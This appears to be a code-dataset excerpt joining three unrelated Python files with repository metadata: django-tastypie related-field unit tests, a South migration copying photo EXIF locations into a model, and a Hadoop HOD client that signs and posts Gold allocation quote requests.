self.assertEqual(field_2.dehydrate(bundle), None)
note = Note.objects.get(pk=1)
request = MockRequest()
request.path = "/api/v1/notes/1/"
bundle = Bundle(obj=note, request=request)
field_3 = ToOneField(UserResource, 'author')
self.assertEqual(field_3.dehydrate(bundle), '/api/v1/users/1/')
field_4 = ToOneField(UserResource, 'author', full=True)
user_bundle = field_4.dehydrate(bundle)
self.assertEqual(isinstance(user_bundle, Bundle), True)
self.assertEqual(user_bundle.data['username'], u'johndoe')
self.assertEqual(user_bundle.data['email'], u'john@doe.com')
def test_dehydrate_with_callable(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = ToOneField(UserResource, lambda bundle: User.objects.get(pk=1))
self.assertEqual(field_1.dehydrate(bundle), '/api/v1/users/1/')
field_2 = ToManyField(UserResource, lambda bundle: User.objects.filter(pk=1))
self.assertEqual(field_2.dehydrate(bundle), ['/api/v1/users/1/'])
field_3 = ToOneField(UserResource, lambda bundle: None)
self.assertRaises(ApiFieldError, field_3.dehydrate, bundle)
def test_dehydrate_full_detail_list(self):
note = Note.objects.get(pk=1)
request = MockRequest()
bundle = Bundle(obj=note, request=request)
# list path with full_list=False
request.path = "/api/v1/notes/"
field_1 = ToOneField(UserResource, 'author', full=True, full_list=False)
self.assertEqual(field_1.dehydrate(bundle), '/api/v1/users/1/')
# detail path with full_detail=False
request.path = "/api/v1/notes/1/"
field_1 = ToOneField(UserResource, 'author', full=True, full_detail=False)
self.assertEqual(field_1.dehydrate(bundle, for_list=False), '/api/v1/users/1/')
def test_hydrate(self):
note = Note()
bundle = Bundle(obj=note)
# With no value or nullable, we should get an ``ApiFieldError``.
field_1 = ToOneField(UserResource, 'author')
self.assertRaises(ApiFieldError, field_1.hydrate, bundle)
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# The nullable case.
field_2 = ToOneField(UserResource, 'author', null=True)
field_2.instance_name = 'fk'
bundle.data['fk'] = None
self.assertEqual(field_2.hydrate(bundle), None)
# Wrong resource URI.
field_3 = ToOneField(UserResource, 'author')
field_3.instance_name = 'fk'
bundle.data['fk'] = '/api/v1/users/abc/'
self.assertRaises(NotFound, field_3.hydrate, bundle)
# A real, live attribute!
field_4 = ToOneField(UserResource, 'author')
field_4.instance_name = 'fk'
bundle.data['fk'] = '/api/v1/users/1/'
fk_bundle = field_4.hydrate(bundle)
self.assertEqual(fk_bundle.data['username'], u'johndoe')
self.assertEqual(fk_bundle.data['email'], u'john@doe.com')
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
field_5 = ToOneField(UserResource, 'author')
field_5.instance_name = 'fk'
bundle.data['fk'] = {
'username': u'mistersmith',
'email': u'smith@example.com',
'password': u'foobar',
}
fk_bundle = field_5.hydrate(bundle)
self.assertEqual(fk_bundle.data['username'], u'mistersmith')
self.assertEqual(fk_bundle.data['email'], u'smith@example.com')
self.assertEqual(fk_bundle.obj.username, u'mistersmith')
self.assertEqual(fk_bundle.obj.email, u'smith@example.com')
# Regression - Make sure Unicode keys get converted to regular strings
# so that we can **kwargs them.
field_6 = ToOneField(UserResource, 'author')
field_6.instance_name = 'fk'
bundle.data['fk'] = {
u'username': u'mistersmith',
u'email': u'smith@example.com',
u'password': u'foobar',
}
fk_bundle = field_6.hydrate(bundle)
self.assertEqual(fk_bundle.data['username'], u'mistersmith')
self.assertEqual(fk_bundle.data['email'], u'smith@example.com')
self.assertEqual(fk_bundle.obj.username, u'mistersmith')
self.assertEqual(fk_bundle.obj.email, u'smith@example.com')
# Attribute & null regression test.
# First, simulate data missing from the bundle & ``null=True``.
# Use a Note with NO author, so that the lookup for the related
# author fails.
note = Note.objects.create(
title='Biplanes for all!',
slug='biplanes-for-all',
content='Somewhere, east of Manhattan, will lie the mythical land of planes with more than one wing...'
)
bundle = Bundle(obj=note)
field_7 = ToOneField(UserResource, 'notinbundle', null=True)
field_7.instance_name = 'notinbundle'
self.assertEqual(field_7.hydrate(bundle), None)
# Then do something in the bundle also with ``null=True``.
field_8 = ToOneField(UserResource, 'author', null=True)
field_8.instance_name = 'author'
fk_bundle = field_8.hydrate(bundle)
self.assertEqual(field_8.hydrate(bundle), None)
# Then use an unsaved object in the bundle also with ``null=True``.
field_9 = ToOneField(UserResource, 'author', null=True)
field_9.instance_name = 'author'
self.assertEqual(field_9.hydrate(bundle), None)
# The blank case.
field_10 = ToOneField(UserResource, 'fk', blank=True)
field_10.instance_name = 'fk'
self.assertEqual(field_10.hydrate(bundle), None)
bundle.data['author'] = '/api/v1/users/1/'
field_11 = ToOneField(UserResource, 'author', blank=True)
field_11.instance_name = 'author'
fk_bundle = field_11.hydrate(bundle)
self.assertEqual(fk_bundle.obj.username, 'johndoe')
# The readonly case.
field_12 = ToOneField(UserResource, 'author', readonly=True)
field_12.instance_name = 'author'
self.assertEqual(field_12.hydrate(bundle), None)
# A related object.
field_13 = ToOneField(UserResource, 'author')
field_13.instance_name = 'fk'
bundle.related_obj = User.objects.get(pk=1)
bundle.related_name = 'author'
fk_bundle = field_13.hydrate(bundle)
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
def test_resource_from_uri(self):
ur = UserResource()
field_1 = ToOneField(UserResource, 'author')
fk_bundle = field_1.resource_from_uri(ur, '/api/v1/users/1/')
self.assertEqual(fk_bundle.data['username'], u'johndoe')
self.assertEqual(fk_bundle.data['email'], u'john@doe.com')
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
fk_bundle = field_1.resource_from_uri(ur, '/api/v1/users/1/', related_obj='Foo', related_name='Bar')
self.assertEqual(fk_bundle.related_obj, None)
self.assertEqual(fk_bundle.related_name, None)
def test_resource_from_data(self):
ur = UserResource()
field_1 = ToOneField(UserResource, 'author')
fk_bundle = field_1.resource_from_data(ur, {
'username': u'mistersmith',
'email': u'smith@example.com',
'password': u'foobar',
})
self.assertEqual(fk_bundle.data['username'], u'mistersmith')
self.assertEqual(fk_bundle.data['email'], u'smith@example.com')
self.assertEqual(fk_bundle.obj.username, u'mistersmith')
self.assertEqual(fk_bundle.obj.email, u'smith@example.com')
fk_bundle = field_1.resource_from_data(ur, {
'username': u'mistersmith',
'email': u'smith@example.com',
'password': u'foobar',
}, related_obj='Foo', related_name='Bar')
self.assertEqual(fk_bundle.related_obj, 'Foo')
self.assertEqual(fk_bundle.related_name, 'Bar')
def test_resource_from_pk(self):
user = User.objects.get(pk=1)
ur = UserResource()
field_1 = ToOneField(UserResource, 'author')
fk_bundle = field_1.resource_from_pk(ur, user)
self.assertEqual(fk_bundle.data['username'], u'johndoe')
self.assertEqual(fk_bundle.data['email'], u'john@doe.com')
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
fk_bundle = field_1.resource_from_pk(ur, user, related_obj='Foo', related_name='Bar')
self.assertEqual(fk_bundle.related_obj, None)
self.assertEqual(fk_bundle.related_name, None)
def test_traversed_attribute_dehydrate(self):
user = User.objects.get(pk=1)
note = Note.objects.create(author=user)
mediabit = MediaBit(note=note)
bundle = Bundle(obj=mediabit)
field_1 = ToOneField(UserResource, 'note__author')
field_1.instance_name = 'fk'
self.assertEqual(field_1.dehydrate(bundle), '/api/v1/users/1/')
field_2 = ToOneField(UserResource, 'fakefield__author')
field_2.instance_name = 'fk'
self.assertRaises(ApiFieldError, field_2.hydrate, bundle)
class SubjectResource(ModelResource):
class Meta:
resource_name = 'subjects'
queryset = Subject.objects.all()
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
if bundle_or_obj is None:
return '/api/v1/subjects/'
return '/api/v1/subjects/%s/' % bundle_or_obj.obj.id
class MediaBitResource(ModelResource):
class Meta:
resource_name = 'mediabits'
queryset = MediaBit.objects.all()
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
if bundle_or_obj is None:
return '/api/v1/mediabits/'
return '/api/v1/mediabits/%s/' % bundle_or_obj.obj.id
class ToManyFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
urls = 'core.tests.field_urls'
def setUp(self):
self.note_1 = Note.objects.get(pk=1)
self.note_2 = Note.objects.get(pk=2)
self.note_3 = Note.objects.get(pk=3)
self.subject_1 = Subject.objects.create(
name='News',
url='/news/'
)
self.subject_2 = Subject.objects.create(
name='Photos',
url='/photos/'
)
self.subject_3 = Subject.objects.create(
name='Personal Interest',
url='/news/personal-interest/'
)
self.note_1.subjects.add(self.subject_1)
self.note_1.subjects.add(self.subject_2)
self.note_2.subjects.add(self.subject_1)
self.note_2.subjects.add(self.subject_3)
def test_init(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertEqual(field_1.instance_name, None)
self.assertEqual(issubclass(field_1.to, SubjectResource), True)
self.assertEqual(field_1.attribute, 'subjects')
self.assertEqual(field_1.related_name, None)
self.assertEqual(field_1.null, False)
self.assertEqual(field_1.full, False)
self.assertEqual(field_1.readonly, False)
self.assertEqual(field_1.help_text, 'Many related resources. Can be either a list of URIs or list of individually nested resource data.')
field_2 = ToManyField(SubjectResource, 'subjects', null=True, help_text='Points to many Subjects.')
self.assertEqual(field_2.instance_name, None)
self.assertEqual(issubclass(field_2.to, SubjectResource), True)
self.assertEqual(field_2.attribute, 'subjects')
self.assertEqual(field_2.related_name, None)
self.assertEqual(field_2.null, True)
self.assertEqual(field_2.full, False)
self.assertEqual(field_2.readonly, False)
self.assertEqual(field_2.help_text, 'Points to many Subjects.')
field_3 = ToManyField(SubjectResource, 'subjects', default=1, null=True, help_text='Points to many Subjects.')
self.assertEqual(field_3.instance_name, None)
self.assertEqual(issubclass(field_3.to, SubjectResource), True)
self.assertEqual(field_3.attribute, 'subjects')
self.assertEqual(field_3.related_name, None)
self.assertEqual(field_3.null, True)
self.assertEqual(field_3.default, 1)
self.assertEqual(field_3.full, False)
self.assertEqual(field_3.readonly, False)
self.assertEqual(field_3.help_text, 'Points to many Subjects.')
field_4 = ToManyField(SubjectResource, 'subjects', default=1, null=True, readonly=True, help_text='Points to many Subjects.')
self.assertEqual(field_4.instance_name, None)
self.assertEqual(issubclass(field_4.to, SubjectResource), True)
self.assertEqual(field_4.attribute, 'subjects')
self.assertEqual(field_4.related_name, None)
self.assertEqual(field_4.null, True)
self.assertEqual(field_4.default, 1)
self.assertEqual(field_4.full, False)
self.assertEqual(field_4.readonly, True)
self.assertEqual(field_4.help_text, 'Points to many Subjects.')
field_5 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="list")
self.assertEqual(field_5.use_in, 'list')
field_6 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="detail")
self.assertEqual(field_6.use_in, 'detail')
def use_in_callable(x):
return True
field_7 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in=use_in_callable)
self.assertTrue(field_7.use_in is use_in_callable)
field_8 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="foo")
self.assertEqual(field_8.use_in, 'all')
def test_dehydrated_type(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertEqual(field_1.dehydrated_type, 'related')
def test_has_default(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertEqual(field_1.has_default(), False)
field_2 = ToManyField(SubjectResource, 'subjects', default=1)
self.assertEqual(field_2.has_default(), True)
def test_default(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertTrue(isinstance(field_1.default, NOT_PROVIDED))
field_2 = ToManyField(SubjectResource, 'subjects', default=1)
self.assertEqual(field_2.default, 1)
def test_dehydrate(self):
note = Note()
bundle_1 = Bundle(obj=note)
field_1 = ToManyField(SubjectResource, 'subjects')
field_1.instance_name = 'm2m'
with self.assertRaises(ApiFieldError):
field_1.dehydrate(bundle_1)
field_2 = ToManyField(SubjectResource, 'subjects', null=True)
field_2.instance_name = 'm2m'
self.assertEqual(field_2.dehydrate(bundle_1), [])
field_3 = ToManyField(SubjectResource, 'subjects')
field_3.instance_name = 'm2m'
bundle_3 = Bundle(obj=self.note_1)
self.assertEqual(field_3.dehydrate(bundle_3), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
field_4 = ToManyField(SubjectResource, 'subjects', full=True)
field_4.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_4 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_4.dehydrate(bundle_4)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
field_5 = ToManyField(SubjectResource, 'subjects')
field_5.instance_name = 'm2m'
bundle_5 = Bundle(obj=self.note_2)
self.assertEqual(field_5.dehydrate(bundle_5), ['/api/v1/subjects/1/', '/api/v1/subjects/3/'])
field_6 = ToManyField(SubjectResource, 'subjects')
field_6.instance_name = 'm2m'
bundle_6 = Bundle(obj=self.note_3)
self.assertEqual(field_6.dehydrate(bundle_6), [])
# Regression for missing variable initialization.
field_7 = ToManyField(SubjectResource, None)
field_7.instance_name = 'm2m'
bundle_7 = Bundle(obj=self.note_3)
with self.assertRaises(ApiFieldError):
# ToManyField requires an attribute of some type.
field_7.dehydrate(bundle_7)
def test_dehydrate_full_detail_list(self):
# details path with full_detail=False
field_1 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=False)
field_1.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_1 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_1.dehydrate(bundle_1, for_list=False), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# list path with full_detail=False
field_2 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=False)
field_2.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_2 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_2.dehydrate(bundle_2)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# list path with full_list=False
field_3 = ToManyField(SubjectResource, 'subjects', full=True, full_list=False)
field_3.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_3 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_3.dehydrate(bundle_3), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# detail path with full_list=False
field_4 = ToManyField(SubjectResource, 'subjects', full=True, full_list=False)
field_4.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_4 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_4.dehydrate(bundle_4, for_list=False)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# list url with callable returning True
field_5 = ToManyField(SubjectResource, 'subjects', full=True, full_list=lambda x: True)
field_5.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_5 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_5.dehydrate(bundle_5)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# list url with callable returning False
field_6 = ToManyField(SubjectResource, 'subjects', full=True, full_list=lambda x: False)
field_6.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_6 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_6.dehydrate(bundle_6), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# detail url with callable returning True
field_7 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=lambda x: True)
field_7.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_7 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_7.dehydrate(bundle_7)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# detail url with callable returning False
field_8 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=lambda x: False)
field_8.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_8 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_8.dehydrate(bundle_8, for_list=False), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# detail url with full_detail=True and get parameters
field_9 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=True)
field_9.instance_name = 'm2m'
request = HttpRequest()
request.method = "GET"
request.GET = {"foo": "bar"}
request.META["QUERY_STRING"] = "foo=bar"
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_9 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_9.dehydrate(bundle_9)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
def test_dehydrate_with_callable(self):
bundle_1 = Bundle(obj=self.note_2)
field_1 = ToManyField(SubjectResource, attribute=lambda bundle: Subject.objects.filter(notes=bundle.obj, name__startswith='Personal'))
field_1.instance_name = 'm2m'
self.assertEqual(field_1.dehydrate(bundle_1), ['/api/v1/subjects/3/'])
def test_hydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
        # With no value and not nullable, we should get an ``ApiFieldError``.
field_1 = ToManyField(SubjectResource, 'subjects')
field_1.instance_name = 'm2m'
self.assertRaises(ApiFieldError, field_1.hydrate_m2m, bundle)
# The nullable case.
field_2 = ToManyField(SubjectResource, 'subjects', null=True)
field_2.instance_name = 'm2m'
empty_bundle = Bundle()
self.assertEqual(field_2.hydrate_m2m(empty_bundle), [])
field_3 = ToManyField(SubjectResource, 'subjects', null=True)
field_3.instance_name = 'm2m'
bundle_3 = Bundle(data={'m2m': []})
self.assertEqual(field_3.hydrate_m2m(bundle_3), [])
# Wrong resource URI.
field_4 = ToManyField(SubjectResource, 'subjects')
field_4.instance_name = 'm2m'
bundle_4 = Bundle(data={'m2m': ['/api/v1/subjects/abc/']})
self.assertRaises(NotFound, field_4.hydrate_m2m, bundle_4)
# A real, live attribute!
field_5 = ToManyField(SubjectResource, 'subjects')
field_5.instance_name = 'm2m'
bundle_5 = Bundle(data={'m2m': ['/api/v1/subjects/1/']})
subject_bundle_list = field_5.hydrate_m2m(bundle_5)
self.assertEqual(len(subject_bundle_list), 1)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
field_6 = ToManyField(SubjectResource, 'subjects')
field_6.instance_name = 'm2m'
bundle_6 = Bundle(data={'m2m': [
{
'name': u'Foo',
'url': u'/foo/',
},
{
'name': u'Bar',
'url': u'/bar/',
},
]})
subject_bundle_list = field_6.hydrate_m2m(bundle_6)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(subject_bundle_list[0].data['name'], u'Foo')
self.assertEqual(subject_bundle_list[0].data['url'], u'/foo/')
self.assertEqual(subject_bundle_list[0].obj.name, u'Foo')
self.assertEqual(subject_bundle_list[0].obj.url, u'/foo/')
self.assertEqual(subject_bundle_list[1].data['name'], u'Bar')
self.assertEqual(subject_bundle_list[1].data['url'], u'/bar/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Bar')
self.assertEqual(subject_bundle_list[1].obj.url, u'/bar/')
# The blank case.
field_7 = ToManyField(SubjectResource, 'fk', blank=True)
field_7.instance_name = 'fk'
self.assertEqual(field_7.hydrate(bundle_6), None)
field_8 = ToManyField(SubjectResource, 'm2m', blank=True)
field_8.instance_name = 'm2m'
subject_bundle_list_2 = field_8.hydrate_m2m(bundle_6)
self.assertEqual(len(subject_bundle_list_2), 2)
self.assertEqual(subject_bundle_list_2[0].data['name'], u'Foo')
self.assertEqual(subject_bundle_list_2[0].data['url'], u'/foo/')
self.assertEqual(subject_bundle_list_2[0].obj.name, u'Foo')
self.assertEqual(subject_bundle_list_2[0].obj.url, u'/foo/')
self.assertEqual(subject_bundle_list_2[1].data['name'], u'Bar')
self.assertEqual(subject_bundle_list_2[1].data['url'], u'/bar/')
self.assertEqual(subject_bundle_list_2[1].obj.name, u'Bar')
self.assertEqual(subject_bundle_list_2[1].obj.url, u'/bar/')
# The readonly case.
field_9 = ToManyField(SubjectResource, 'subjects', readonly=True)
field_9.instance_name = 'm2m'
self.assertEqual(field_9.hydrate(bundle_6), None)
# A related object.
field_10 = ToManyField(MediaBitResource, 'media_bits', related_name='note')
field_10.instance_name = 'mbs'
note_1 = Note.objects.get(pk=1)
bundle_10 = Bundle(obj=note_1, data={'mbs': [
{
'title': 'Foo!',
},
]})
media_bundle_list = field_10.hydrate_m2m(bundle_10)
self.assertEqual(len(media_bundle_list), 1)
self.assertEqual(media_bundle_list[0].obj.title, u'Foo!')
def test_traversed_attribute_dehydrate(self):
mediabit = MediaBit(id=1, note=self.note_1)
bundle = Bundle(obj=mediabit)
field_1 = ToManyField(SubjectResource, 'note__subjects')
field_1.instance_name = 'm2m'
self.assertEqual(field_1.dehydrate(bundle), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
field_2 = ToOneField(SubjectResource, 'fakefield__subjects')
field_2.instance_name = 'm2m'
self.assertRaises(ApiFieldError, field_2.hydrate, bundle)
|
ocadotechnology/django-tastypie
|
tests/core/tests/fields.py
|
Python
|
bsd-3-clause
| 56,800 | 0.001268 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.contrib.gis.geos import geometry
from PIL import Image
from PIL.ExifTags import TAGS
from ..util import point_from_exif
class Migration(DataMigration):
def forwards(self, orm):
for photo in orm['photomap.Photo'].objects.all():
photo.location = point_from_exif(photo.image.path)
photo.save()
def backwards(self, orm):
        raise NotImplementedError('Too lazy to write a method that writes'
                                  ' the coordinates back to the EXIF of the files')
models = {
u'photomap.photo': {
'Meta': {'object_name': 'Photo'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'})
}
}
complete_apps = ['photomap']
symmetrical = True
|
dschep/django-photomap
|
photomap/migrations/0004_copy_exif_data_to_model.py
|
Python
|
mit
| 1,128 | 0.003546 |
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
"""Gold Allocation Manager Implementation"""
# -*- python -*-
import sys, httplib
import sha, base64, hmac
import xml.dom.minidom
from hodlib.Common.util import *
class goldAllocationManager:
def __init__(self, cfg, log):
self.__GOLD_SECRET_KEY_FILE = cfg['auth-file']
(self.__goldHost, self.__goldPort) = (cfg['allocation-manager-address'][0],
cfg['allocation-manager-address'][1])
self.cfg = cfg
self.log = log
def getQuote(self, user, project, ignoreErrors=True):
# Get Secret Key from File
secret = ''
try:
secretFile = open(self.__GOLD_SECRET_KEY_FILE)
secret = secretFile.readline()
except Exception, e:
self.log.error("Unable to open file %s" % self.__GOLD_SECRET_KEY_FILE)
self.log.debug(get_exception_string())
return (ignoreErrors or False)
secretFile.close()
secret = secret.rstrip()
    # construct the SSSRMAP request body
body = '<Body><Request action="Quote" actor="hod"><Object>Job</Object><Data><Job><ProjectId>%s</ProjectId><UserId>%s</UserId><WallDuration>10</WallDuration></Job></Data></Request></Body>' % (project, user)
# compute digest
message = sha.new()
message.update(body)
digest = message.digest()
digestStr = base64.b64encode(digest)
# compute signature
message = hmac.new(secret, digest, sha)
signatureStr = base64.b64encode(message.digest())
# construct the SSSRMAP Message
sssrmapRequest = '<?xml version="1.0" encoding="UTF-8"?>\
<Envelope>%s<Signature><DigestValue>%s</DigestValue><SignatureValue>%s</SignatureValue><SecurityToken type="Symmetric"></SecurityToken></Signature></Envelope>' % (body, digestStr, signatureStr)
self.log.info('sssrmapRequest: %s' % sssrmapRequest)
try:
# post message to GOLD server
webservice = httplib.HTTP(self.__goldHost, self.__goldPort)
webservice.putrequest("POST", "/SSSRMAP3 HTTP/1.1")
webservice.putheader("Content-Type", "text/xml; charset=\"utf-8\"")
webservice.putheader("Transfer-Encoding", "chunked")
webservice.endheaders()
webservice.send("%X" % len(sssrmapRequest) + "\r\n" + sssrmapRequest + '0\r\n')
# handle the response
statusCode, statusmessage, header = webservice.getreply()
responseStr = webservice.getfile().read()
self.log.debug("httpStatusCode: %d" % statusCode)
self.log.info('responseStr: %s' % responseStr)
# parse XML response
if (statusCode == 200):
responseArr = responseStr.split("\n")
responseBody = responseArr[2]
try:
doc = xml.dom.minidom.parseString(responseBody)
responseVal = doc.getElementsByTagName("Value")[0].firstChild.nodeValue
self.log.info("responseVal: %s" % responseVal)
if (responseVal == 'Success'):
return True
else:
return False
except Exception, e:
self.log.error("Unable to parse GOLD responseBody XML \"(%s)\" to get responseVal" % (responseBody))
self.log.debug(get_exception_string())
return (ignoreErrors or False)
else:
self.log.error("Invalid HTTP statusCode %d" % statusCode)
except Exception, e:
self.log.error("Unable to POST message to GOLD server (%s, %d)" %
(self.__goldHost, self.__goldPort))
self.log.debug(get_exception_string())
return (ignoreErrors or False)
return True
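def _example_sign(secret, body):
  """Illustrative sketch (not part of the original module): mirrors the
  SSSRMAP signing steps used in getQuote above -- a SHA-1 digest of the
  request body, then an HMAC-SHA1 of that raw digest keyed with the shared
  secret, both base64-encoded."""
  digest = sha.new(body).digest()
  digestStr = base64.b64encode(digest)
  signatureStr = base64.b64encode(hmac.new(secret, digest, sha).digest())
  return (digestStr, signatureStr)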
|
ZhangXFeng/hadoop
|
src/hadoop-mapreduce1-project/src/contrib/hod/hodlib/AllocationManagers/goldAllocationManager.py
|
Python
|
